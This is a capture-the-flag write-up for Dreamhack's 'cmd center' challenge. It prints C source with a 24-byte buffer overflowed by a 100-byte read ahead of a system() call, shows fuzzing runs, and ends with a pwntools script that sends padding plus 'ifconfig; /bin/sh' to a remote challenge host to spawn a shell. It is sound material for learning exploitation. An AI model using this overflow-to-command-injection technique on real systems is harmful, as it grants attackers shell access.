Write-up of the challenge “cmd center”#

This challenge is part of the “Binary exploitation” category and is in Level 1.

Goal of the challenge#

The objective of this challenge is to overwrite the value of the ifconfig with ifconfig; /bin/sh

Program structure#

1
#include <stdlib.h>
2
#include <stdio.h>
3
#include <string.h>
4
#include <unistd.h>
5

6
void init() {
7
  setvbuf(stdin, 0, 2, 0);
8
  setvbuf(stdout, 0, 2, 0);
9
}
10

11
int main()
12
{
13

14
  char cmd_ip[256] = "ifconfig";
15
  int dummy;
16
  char center_name[24];
17

18
  init();
19

20
  printf("Center name: ");
21
  read(0, center_name, 100);
22

23

24
  if( !strncmp(cmd_ip, "ifconfig", 8)) {
25
    system(cmd_ip);
26
  }
27

28
  else {
29
    printf("Something is wrong!\n");
30
  }
31
  exit(0);
32
}

Security breach#

The vulnerability read(0, center_name, 100);, basic buffer overflow where center_name is 24 bytes but it is reading 100 bytes.

Solution#

So my solution was to try to see at which length does the program print out printf(“Something is wrong!\n”);, because it means we overwrote the first character in the ifconfig place and when we know that length we can later just put ifconfig; /bin/sh to spawn a shell.

So I just did a few fuzz tests:

1
──(venv_lin)(abdullah㉿Abdullah)-[/mnt/d/chals/Dreamhack/pwn/cmd_center]
2
└─$ ls
3
cmd_center  cmd_center.c  solve.py
4

5
┌──(venv_lin)(abdullah㉿Abdullah)-[/mnt/d/chals/Dreamhack/pwn/cmd_center]
6
└─$ ./cmd_center
7
Center name: jewxztynjgherpfrtntbpxmvdhpaoy
8
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1488
9
        inet 172.26.188.160  netmask 255.255.240.0  broadcast 172.26.191.255
10
        inet6 fe80::215:5dff:fe0f:5ad2  prefixlen 64  scopeid 0x20<link>
11
        ether 00:15:5d:0f:5a:d2  txqueuelen 1000  (Ethernet)
12
        RX packets 1338  bytes 239311 (233.7 KiB)
13
        RX errors 0  dropped 0  overruns 0  frame 0
14
        TX packets 12  bytes 824 (824.0 B)
15
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
16

17
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
18
        inet 127.0.0.1  netmask 255.0.0.0
19
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
20
        loop  txqueuelen 1000  (Local Loopback)
21
        RX packets 60  bytes 6016 (5.8 KiB)
22
        RX errors 0  dropped 0  overruns 0  frame 0
23
        TX packets 60  bytes 6016 (5.8 KiB)
24
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
25

26

27
┌──(venv_lin)(abdullah㉿Abdullah)-[/mnt/d/chals/Dreamhack/pwn/cmd_center]
28
└─$ ./cmd_center
29
Center name: wwlpxmthfaugwpurjwuncpcrqavqxvzkixypzwld
30
Something is wrong!
31

32
┌──(venv_lin)(abdullah㉿Abdullah)-[/mnt/d/chals/Dreamhack/pwn/cmd_center]
33
└─$ ./cmd_center
34
Center name: wwlpxmthfaugwpurjwuncpcrqavqxvzkixypzwl
35
Something is wrong!
36

37
┌──(venv_lin)(abdullah㉿Abdullah)-[/mnt/d/chals/Dreamhack/pwn/cmd_center]
38
└─$ ./cmd_center
39
Center name: wwlpxmthfaugwpurjwuncpcrqavqxvzkixypzw
40
Something is wrong!
41

42
┌──(venv_lin)(abdullah㉿Abdullah)-[/mnt/d/chals/Dreamhack/pwn/cmd_center]
43
└─$ ./cmd_center
44
Center name: wwlpxmthfaugwpurjwuncpcrqavqxvzkixypz
45
Something is wrong!
46

47
┌──(venv_lin)(abdullah㉿Abdullah)-[/mnt/d/chals/Dreamhack/pwn/cmd_center]
48
└─$ ./cmd_center
49
Center name: wwlpxmthfaugwpurjwuncpcrqavqxvzkixyp
50
Something is wrong!
51

52
┌──(venv_lin)(abdullah㉿Abdullah)-[/mnt/d/chals/Dreamhack/pwn/cmd_center]
53
└─$ ./cmd_center
54
Center name: wwlpxmthfaugwpurjwuncpcrqavqxvzkixy
55
Something is wrong!
56

57
┌──(venv_lin)(abdullah㉿Abdullah)-[/mnt/d/chals/Dreamhack/pwn/cmd_center]
58
└─$ ./cmd_center
59
Center name: wwlpxmthfaugwpurjwuncpcrqavqxvzkix
60
Something is wrong!
61

62
┌──(venv_lin)(abdullah㉿Abdullah)-[/mnt/d/chals/Dreamhack/pwn/cmd_center]
63
└─$ ./cmd_center
64
Center name: wwlpxmthfaugwpurjwuncpcrqavqxvzki
65
Something is wrong!
66

67
┌──(venv_lin)(abdullah㉿Abdullah)-[/mnt/d/chals/Dreamhack/pwn/cmd_center]
68
└─$ ./cmd_center
69
Center name: wwlpxmthfaugwpurjwuncpcrqavqxvzk
70
Something is wrong!
71

72
┌──(venv_lin)(abdullah㉿Abdullah)-[/mnt/d/chals/Dreamhack/pwn/cmd_center]
73
└─$ ./cmd_center
74
Center name: wwlpxmthfaugwpurjwuncpcrqavqxvz
75
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1488
76
        inet 172.26.188.160  netmask 255.255.240.0  broadcast 172.26.191.255
77
        inet6 fe80::215:5dff:fe0f:5ad2  prefixlen 64  scopeid 0x20<link>
78
        ether 00:15:5d:0f:5a:d2  txqueuelen 1000  (Ethernet)
79
        RX packets 1343  bytes 240245 (234.6 KiB)
80
        RX errors 0  dropped 0  overruns 0  frame 0
81
        TX packets 12  bytes 824 (824.0 B)
82
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
83

84
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
85
        inet 127.0.0.1  netmask 255.0.0.0
86
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
87
        loop  txqueuelen 1000  (Local Loopback)
88
        RX packets 60  bytes 6016 (5.8 KiB)
89
        RX errors 0  dropped 0  overruns 0  frame 0
90
        TX packets 60  bytes 6016 (5.8 KiB)
91
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

This is how I found out that we need a padding of 32 chars to overwrite the ifconfig place and we just put after ; /bin/sh to spawn a shell!

1
from pwn import *
2

3
# p = process('cmd_center')
4
p = remote('host8.dreamhack.games', 19474)
5

6
payload = b'wwlpxmthfaugwpurjwuncpcrqavqxvza'
7

8
payload += b'ifconfig; /bin/sh'
9

10
p.sendline(payload)
11
p.interactive()